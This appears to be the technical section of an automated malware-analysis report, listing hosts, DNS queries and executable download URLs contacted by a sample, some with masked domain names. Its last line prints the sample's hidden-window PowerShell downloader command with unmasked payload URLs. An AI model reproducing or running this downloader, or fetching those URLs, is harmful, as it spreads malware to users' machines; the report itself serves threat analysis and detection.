Technical Information
- 'fa#######tingsolutions.co.za':80
- 'lo##con.es':80
- 'lo##con.es':443
- 'x1.#.lencr.org':80
- 'je####runlian.com':80
- 'hu###omains.com':443
- 'pe######tontailmovie.com':80
- http://fa#######tingsolutions.co.za/rlcynwt.exe
- http://lo##con.es/ftxxkfa.exe
- http://x1.#.lencr.org/
- http://je####runlian.com/jepmkvi.exe
- 'lo##con.es':443
- 'hu###omains.com':443
- DNS ASK cr######werfulchange.com
- DNS ASK fa#######tingsolutions.co.za
- DNS ASK lo##con.es
- DNS ASK x1.#.lencr.org
- DNS ASK je####runlian.com
- DNS ASK hu###omains.com
- DNS ASK pe######tontailmovie.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden $webclient = new-object System.Net.WebClient;$myurls = 'http://createpowerfulchange.com/srbedgp.exe,http://fabrictestingsolutions.co.za/rlcynwt.exe,http://lomicon.es/ftxxkfa...' (with hidden window)